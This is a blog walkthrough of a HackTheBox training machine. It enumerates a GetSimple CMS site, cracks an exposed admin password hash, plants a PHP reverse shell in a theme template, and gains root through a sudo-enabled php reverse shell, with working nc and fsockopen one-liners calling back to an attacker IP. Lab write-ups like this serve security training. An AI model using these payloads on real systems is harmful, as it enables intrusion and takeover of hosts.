Simple walkthrough for nibble knowledge check

Posted on By gutocomy
HackTheBox, Machines

In this posting, I will walkthrough knowledge check in getting started (nibbles).

Steps are very similar to Nibble problem, but there are some variations.

I will share how to solve the problem.

Enumeration

First of all, we need to scan a target IP to collect information.

Let’s start with nmap.

nmap -sC -sV 10.129.244.24

Then the output is like below.

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4c73a025f5fe817b822b3649a54dc85e (RSA)
|   256 e1c056d052042f3cac9ae7b1792bbb13 (ECDSA)
|_  256 523147140dc38e1573e3c424a23a1277 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Welcome to GetSimple! - gettingstarted
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/admin/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

It has a web server. So let’s check the web page.

It looks like there is not much information in it.

I checked the page source, but there wasn’t any useful information either.

Then we could try to find sub-directories of the website.

gobuster dir -u http://10.129.244.24 -w /usr/share/wordlists/dirb/common.txt

/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/admin                (Status: 301) [Size: 314] [--> http://10.129.244.24/admin/]
/backups              (Status: 301) [Size: 316] [--> http://10.129.244.24/backups/]
Progress: 1072 / 4615 (23.23%)                                                  /data                 (Status: 301) [Size: 313] [--> http://10.129.244.24/data/]   
Progress: 1269 / 4615 (27.50%)                                                  Progress: 1269 / 4615 (27.50%)                                                  Progress: 1269 / 4615 (27.50%)                                                  Progress: 1269 / 4615 (27.50%)                                                  Progress: 1690 / 4615 (36.62%)                                                  /index.php            (Status: 200) [Size: 5485]                                   
/plugins              (Status: 301) [Size: 316] [--> http://10.129.244.24/plugins/]
/robots.txt           (Status: 200) [Size: 32]                                     
/server-status        (Status: 403) [Size: 278]                                    
/sitemap.xml          (Status: 200) [Size: 431]

If we run the gobuster command, we can see some interesting directories.

Let’s take a look.

There is a login page in /login

And I found another useful directory which is /data.

There is a username!

I think it is a default username. admin.

Another point is the <PWD> tag. There is the hashed password!

We can check the hash type using hash-identifier.

hash-identifier d033e22ae348aeb5660fc2140aec35850c4da997

Then, it tells us the hash is highly likely to be SHA1.

If we decrypt the hash (using hashcat or just use an online decryption tool), the value is admin.

Let’s go back to the login page and input admin, admin into username and password.

Okay! we are in now.

Let’s move on to the next step.

Reverse shell

In order to find the flags, I need to be connected to the target system.

Since the website seems to have an upload function, it is worth going with a reverse shell.

If we have a look at the web, it can be known that the theme editor has the template.php file.

Let’s delete the original code and write a script for a reverse shell.

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.175 9443 >/tmp/f"); ?>

If we type the url path of the editing file shown in the image above, the shell script will be triggered.

Listen to the port 9443 before triggering the file.

nc -lvnp 9443

By the way, if we want to type exactly the same url, then we need to register its domain in /etc/hosts file to connect with the target IP.

sudo vim /etc/hosts

...
10.10.14.254 gettingstarted.htb

ok, we are ready to go.

Let’s run it.

Boom! we are in the target system now.

It’s easy to get the user flag now.

Heading to the home directory and get it.

Ok, the next target is the root flag.

Privilege escalation

Since the user doesn’t have permission to access the root directory, we need to escalate the privilege.

I checked if we have any sudo permission as root.

sudo -l

User www-data may run the following commands on gettingstarted:
    (ALL : ALL) NOPASSWD: /usr/bin/php

And there is an interesting result!

we can sudo /usr/bin/php and it doesn’t ask us for a password. So let’s use this vulnerability.

Again, I will get a connection using a reverse shell script.

sudo /usr/bin/php -r '$sock=fsockopen("10.10.14.175",8443);exec("sh <&3 >&3 2>&3");'

Don’t forget to set the port number to a port number that is not being used.

Listen to port 8443 and execute the command.

Then, now we are connected as root!

Got the root flag!

You may also like

HackTheBox
Hack the box – Precious write-up
HackTheBox
Hack the box – machine – Blue
HackTheBox
Hack the box – Shocker (CVE-2014-6271)
HackTheBox
Hack the box – machine – Netmon (CVE-2018-9276)